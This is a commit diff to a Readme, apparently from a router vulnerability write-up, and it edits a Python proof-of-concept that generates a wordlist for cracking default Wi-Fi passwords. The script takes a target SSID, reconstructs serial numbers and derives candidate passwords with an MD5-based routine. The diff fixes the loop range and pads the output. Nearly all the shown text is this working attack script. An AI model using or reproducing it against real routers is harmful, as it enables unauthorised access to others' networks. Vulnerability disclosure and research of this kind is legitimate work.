
Update 'Readme.md'

nico 4 years ago
parent
commit
0447c7daad
1 changed files with 18 additions and 17 deletions
  1. 18 17
      Readme.md

+ 18 - 17
Readme.md

@@ -493,28 +493,28 @@ With this information we can write a PoC script that can produce a wordlist to e
 import argparse, base64,  hashlib, re
 
 def genpwd_longpasswd(oui, serialnum):
-    def str2md5(string):
-        m = hashlib.md5()
-        m.update(string.encode("ascii"))
-        return m.digest()
+	def str2md5(string):
+		m = hashlib.md5()
+		m.update(string.encode("ascii"))
+		return m.digest()
 
-    #secret1 = "%s-ALCL%s" % (oui, serialnum)
-    secret2 = "%s-01%u" % (oui, int(serialnum, 16))
+	#secret1 = "%s-ALCL%s" % (oui, serialnum)
+	secret2 = "%s-01%u" % (oui, int(serialnum, 16))
 
-    #md5_secret1 = str2md5(secret1)
-    md5_secret2 = str2md5(secret2)
+	#md5_secret1 = str2md5(secret1)
+	md5_secret2 = str2md5(secret2)
 
-    #wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
+	#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
 
-    lower = upper = 0
+	lower = upper = 0
 
-    for i in range(8):
-        upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
-        lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
+	for i in range(8):
+		upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
+		lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
 
-    longpasswd = ((upper<<32)+lower)%0x2540be400
+	longpasswd = ((upper<<32)+lower)%0x2540be400
 
-    return longpasswd
+	return longpasswd
 
 parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
 parser.add_argument("ssid", type=str, help="the ssid to attack")
@@ -551,8 +551,9 @@ for s in ssids:
         serialBytes = args.ssid
         for r in s.split("[A-F0-9]{4}"):
             serialBytes = serialBytes.replace(r, "")
-        for i in range(0xffff):
-            print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes)))
+        for i in range(0xffff + 1):
+            candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))
+            print(f"{candidate:010}")
         break
 ```